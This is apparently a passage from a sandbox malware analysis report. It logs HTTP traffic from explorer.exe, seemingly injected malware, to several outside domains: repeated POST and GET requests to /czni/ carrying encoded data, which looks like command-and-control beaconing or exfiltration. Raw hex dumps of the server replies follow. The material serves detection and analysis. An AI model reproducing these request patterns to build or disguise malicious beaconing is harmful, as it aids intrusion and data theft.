20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/'
                                                                          Jan 30, 2023 13:41:49.222260952 CET1022INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 45 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 2f 70 61 72 6b 2e 6a 73 22 3e 27 0a 20 20 20 20 20 20 20
                                                                          Data Ascii: + 'IONOSParkingES' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          24192.168.2.54973567.215.9.13880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:54.457782984 CET1023OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.versusfinances.tech
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.versusfinances.tech
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.versusfinances.tech/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 75 62 66 36 57 6c 45 4e 62 78 6b 57 37 44 51 51 39 38 58 30 62 55 42 6f 35 47 6d 73 52 78 48 39 67 6c 45 55 51 53 5a 36 36 6c 4f 4a 67 62 7a 46 4d 7a 62 61 6f 5a 57 64 55 6d 57 52 68 6d 56 4f 28 37 4b 31 79 6e 57 71 6b 30 55 57 50 46 33 59 6e 32 41 4d 38 75 47 45 53 65 78 63 48 30 4f 67 68 30 77 37 43 42 42 39 7a 4a 72 47 53 46 45 49 31 50 77 38 36 6a 71 70 30 4a 31 61 33 2d 6f 50 48 45 4f 66 63 49 67 74 78 36 64 52 61 69 6a 67 37 4e 6d 59 78 66 7e 51 68 6f 41 54 76 2d 47 47 31 46 53 4b 36 6c 59 64 78 45 47 51 48 6c 34 55 58 51 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=ubf6WlENbxkW7DQQ98X0bUBo5GmsRxH9glEUQSZ66lOJgbzFMzbaoZWdUmWRhmVO(7K1ynWqk0UWPF3Yn2AM8uGESexcH0Ogh0w7CBB9zJrGSFEI1Pw86jqp0J1a3-oPHEOfcIgtx6dRaijg7NmYxf~QhoATv-GG1FSK6lYdxEGQHl4UXQ).
                                                                          Jan 30, 2023 13:41:54.568286896 CET1024INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          content-type: text/html
                                                                          content-length: 244
                                                                          content-encoding: gzip
                                                                          vary: Accept-Encoding,User-Agent
                                                                          date: Mon, 30 Jan 2023 12:41:54 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 b1 0d c0 20 0c 04 c0 9e 29 7e 02 58 00 51 27 6d 36 40 c4 08 37 b6 84 01 4b 99 3e 77 a9 7d c2 09 5e 0d a2 0b 5d b7 bc 50 c1 1a 6c 30 9a 87 66 0c f9 7a 4a c8 77 71 f7 78 68 da b6 ce 52 a5 91 c5 45 6d fc 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 46 2f cf 6b e4 01 00 00
                                                                          Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )~XQ'm6@7K>w}^]Pl0fzJwqxhREmwwF/k


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          25192.168.2.54973667.215.9.13880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:57.089145899 CET1024OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== HTTP/1.1
                                                                          Host: www.versusfinances.tech
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:57.198988914 CET1025INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          content-type: text/html
                                                                          content-length: 611
                                                                          date: Mon, 30 Jan 2023 12:41:57 GMT
                                                                          server: LiteSpeed
                                                                          vary: User-Agent
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 7a 6e 69 2f 3f 32 30 3d 34 78 66 50 69 76 33 52 6e 45 26 61 6d 70 3b 7a 38 72 75 6c 2d 6e 3d 6a 5a 33 61 56 56 73 4f 50 43 51 38 7a 44 6f 6c 77 66 50 4d 4a 30 46 67 79 41 53 4f 64 6c 54 2b 70 55 55 5a 57 47 6c 75 78 7a 65 4a 69 76 72 66 43 7a 58 34 2b 37 6a 65 54 6c 50 69 6b 68 31 47 37 50 50 2b 35 47 36 56 39 45 51 70 47 51 54 33 75 48 73 4b 34 62 4c 69 65 37 46 64 43 30 62 34 70 77 3d 3d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 76 65 72 73 75 73 66 69 6e 61 6e 63 65 73 2e 74 65 63 68 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /czni/?20=4xfPiv3RnE&amp;z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== was not found on this server.<HR><I>www.versusfinances.tech</I></BODY></HTML>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          26192.168.2.549737185.104.28.23880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:07.322936058 CET1026OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.hayethe.site
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.hayethe.site
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.hayethe.site/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 61 59 33 73 7e 5a 7a 63 38 58 44 63 32 74 37 6b 68 4f 34 73 53 62 55 30 75 35 37 48 42 77 64 30 58 34 38 70 32 46 7e 4a 6c 6c 6e 77 52 6a 69 54 38 35 54 66 6a 32 51 66 57 43 58 6d 6a 4a 32 69 7e 70 6f 6b 42 59 71 55 7e 4a 48 76 56 57 58 6d 32 4d 6e 57 79 35 44 5f 5a 56 4c 5f 46 33 65 64 33 65 41 39 7e 45 71 31 31 66 51 34 4d 43 46 76 69 78 62 35 33 4b 28 4f 69 78 35 38 53 6b 73 4d 77 58 63 4a 4d 34 65 30 46 69 73 64 43 75 7a 77 46 67 5a 5f 5a 75 41 44 45 5a 5a 45 76 55 4c 46 6b 68 48 74 6f 53 55 75 34 4a 4a 38 63 52 6f 48 73 77 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=aY3s~Zzc8XDc2t7khO4sSbU0u57HBwd0X48p2F~JllnwRjiT85Tfj2QfWCXmjJ2i~pokBYqU~JHvVWXm2MnWy5D_ZVL_F3ed3eA9~Eq11fQ4MCFvixb53K(Oix58SksMwXcJM4e0FisdCuzwFgZ_ZuADEZZEvULFkhHtoSUu4JJ8cRoHsw).
                                                                          Jan 30, 2023 13:42:07.349845886 CET1027INHTTP/1.1 404 Not Found
                                                                          date: Mon, 30 Jan 2023 12:42:07 GMT
                                                                          server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
                                                                          content-length: 203
                                                                          content-type: text/html; charset=iso-8859-1
                                                                          connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 7a 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          27192.168.2.549738185.104.28.23880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:09.881613970 CET1027OUTGET /czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.hayethe.site
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:09.908283949 CET1028INHTTP/1.1 404 Not Found
                                                                          date: Mon, 30 Jan 2023 12:42:09 GMT
                                                                          server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
                                                                          content-length: 203
                                                                          content-type: text/html; charset=iso-8859-1
                                                                          connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 7a 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          28192.168.2.549739172.67.179.19180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:14.977011919 CET1029OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.octohoki.net
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.octohoki.net
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.octohoki.net/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 31 67 71 65 57 7a 56 79 71 56 50 34 53 30 77 66 68 48 68 67 4b 42 72 35 65 72 62 5f 38 65 28 71 72 6d 6f 32 4a 32 52 54 36 2d 49 33 34 6b 76 34 6b 69 47 6a 78 70 44 65 6a 6f 78 44 58 63 49 47 61 48 58 66 71 66 4a 61 78 56 47 54 69 71 74 36 6d 6a 48 6e 4d 4b 50 2d 79 4f 38 38 51 39 66 6c 47 6d 4c 79 74 68 55 30 52 33 6c 43 37 7a 32 6b 33 5a 7e 31 77 63 48 41 54 37 54 6c 72 46 67 63 79 4c 66 46 59 50 58 64 68 53 6a 6e 49 79 77 61 46 61 47 6f 57 72 54 36 62 74 4a 4d 4f 53 79 67 67 6a 46 46 70 76 77 34 59 32 38 39 51 42 64 32 63 77 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=1gqeWzVyqVP4S0wfhHhgKBr5erb_8e(qrmo2J2RT6-I34kv4kiGjxpDejoxDXcIGaHXfqfJaxVGTiqt6mjHnMKP-yO88Q9flGmLythU0R3lC7z2k3Z~1wcHAT7TlrFgcyLfFYPXdhSjnIywaFaGoWrT6btJMOSyggjFFpvw4Y289QBd2cw).
                                                                          Jan 30, 2023 13:42:15.295717955 CET1030INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:42:15 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qli%2BxEDjmLkYhchRvDrr074cTc9eMZY83d73NAVWZzvTZwZhsWIlzncpTM4l3hJ1RrfIspzXd%2BqHuWC4038gwPm6w68qgBI8OHSEyQncXNeI7C8UmvAIBsEEaOmHCDGcTD%2B3"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 791a4953bf1106e5-LHR
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 32 64 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 53 4d 6f db 38 10 bd fb 57 4c 59 60 4f a5 e5 b8 2d b0 70 25 01 41 92 76 7b 68 52 34 2d b0 3d 8e c4 89 44 98 22 59 72 64 c7 ff be a0 f5 11 27 4d 7b aa 0e 96 c8 79 f3 66 de 9b 71 fe e2 f2 e6 e2 eb f7 cf 57 d0 72 67 ca 45 9e 5e 60 d0 36 85 20 2b d2 05 a1 2a 17 00 00 39 6b 36 54 be 59 bd 81 cf e7 1f ae e0 fa e6 2b bc bf f9 76 7d 99 67 43 64 31 c0 5e 48 09 9f 88 11 a4 1c 13 bb 74 aa 5b 0c 91 b8 10 3d df c9 7f c5 69 a8 65 f6 92 7e f4 7a 57 88 ff e5 b7 73 79 e1 3a 8f ac 2b 43 02 6a 67 99 2c 17 e2 e3 55 41 aa a1 47 99 73 70 af 15 b7 c5 d9 7a b5 7a 05 da 6a d6 68 64 ac d1 50 71 26 c0 62 47 85 d8 69 da 7b 17 78 22 48 7d 3e 61 99 21 cf 11 8b f2 a9 a2 09 33 55 50 14 eb a0 3d 6b 67 c5 1f 81 d8 73 eb 82 38 75 ec 3d ee 74 ed ec 43 09 a3 ed 16 02 99 42 c4 d6 05 ae 7b 86 04 10 d0 06 ba 2b c4 dd 80 5f ea da 3d e2 b9 b8 bd 85 0f c6 55 68 20 b9 d8 9b e8 c2 e1 59 56 3e 18 8a 2d 11 4f 94 75 8c 59 e5 1c 47 0e e8 97 7b aa 96 9d b6 cb 3a c6 51 cc 09 c3 43 42 a0 e8 9d 8d 7a 47 29 21 81 7f a5 e7 83 a7 42 30 dd 73 36 b0 e5 d9 b0 56 79 e5 d4 a1 5c 2c 72 8b 3b a8 0d c6 58 08 8b bb 0a c3 b1 64 ae f4 7c 9d 3c 44 6d 29 4c ce 9e c4 86 14 99 38 e7 38 40 5e f5 cc ce 8e d5 87 83 78 92 c2 ae 69 d2 92 29 64 1c 0f a9 94 31 e8 e3 7c 8d a1 49 7b fb b2 3b 5c 3f f4 36 d6 88 1e ed c4 99 e6 21 8f f1 3c 4b f7 7f 19 06 bf 79 26 b9 d9 20 71 96 8f 4f b4 56 01 ad 9a 66 fd 52 3c fb 47 c6 d1 dc 4c e9 dd 71 02 c3 47 9e 59 3c 9e 17 bf 1b c9 10 d0 aa 10 ac eb 2d 85 d9 e8 3d 19 03 e9 47 c6 4e c0 71 2b 0a d1 61 68 b4 95 95 63 76 dd e6 ec ad bf 7f 07 1e 95 d2 b6 91 ec fc 06 1e dd 8c b0 b5 bf 17 65 de 61 f8 d1 13 95 83 57 a9 60 15 1c aa 1a 23 8b f2 3f 34 d8 a1 05 d6 0a b7 a0 34 53 d7 6f d1 8e 06 e6 d9 9c 3c ca 3a 11 13 dc 1e d2 86 ca 9a 2c a7 fe c7 56 5b d2 4d cb 9b d7 ab 55 2a bf c8 db f5 94 71 44 ef 31 58 6d 9b 3f 94 6e d7 e5 e2 56 1b dc a2 85 2d 75 15 1a 0d 5b 4a e3 19 26 91 69 ab e8 7e e9 5b ff 40 72 49 3e a5 62 72 7e 1c c0 2f 0d 9f 1a 0b f3 28 e4 9d e9 b5 7a 56 c9 60 fa 66 75 62 ed e6 e8 73 e5
                                                                          Data Ascii: 2d7SMo8WLY`O-p%Av{hR4-=D"Yrd'M{yfqWrgE^`6 +*9k6TY+v}gCd1^Ht[=ie~zWsy:+Cjg,UAGspzzjhdPq&bGi{x"H}>a!3UP=kgs8u=tCB{+_=Uh YV>-OuYG{:QCBzG)!B0s6Vy\,r;Xd|<Dm)L88@^xi)d1|I{;\?6!<Ky& qOVfR<GLqGY<-=GNq+ahcveaW`#?44So<:,V[MU*qD1Xm?nV-u[J&i~[@rI>br~/(zV`fubs
                                                                          Jan 30, 2023 13:42:15.295805931 CET1030INData Raw: 82 a2 20 03 2a dd c7 cd 51 e7 3f b5 f3 87 77 b0 5e 9d bd 85 0b e7 0f 21 99 b0 84 73 63 e0 4b fa 8c f0 85 22 85 1d a9 e5 d0 da 4f 00 00 00 ff ff 03 00 09 5f c9 a2 49 06 00 00 0d 0a
                                                                          Data Ascii: *Q?w^!scK"O_I
                                                                          Jan 30, 2023 13:42:15.295852900 CET1031INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          29192.168.2.549740172.67.179.19180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:42:17.527848005 CET1032OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA== HTTP/1.1
                                                                          Host: www.octohoki.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:42:17.854996920 CET1033INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:42:17 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2BsKB3TdwtpE%2FkxJI0cv7MJgObb8a3UJf4PnZaGfmHBpE61FYhi6JD%2FJhhbo%2Fu%2FXC7tZwRPM8r6K8BmXzULATwGj3qTqGV2XHL2b46jrFl%2FnGDeV17bC8DEBCvP%2BYyK595T3"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 791a4963a82e71ed-LHR
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 36 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 4d 65 74 61 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 32 30 30 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 32 30 30 22 3e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 53 20 47 6c 6f 62 61 6c 20 43 6f 6d 70 75 6c 73 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 77 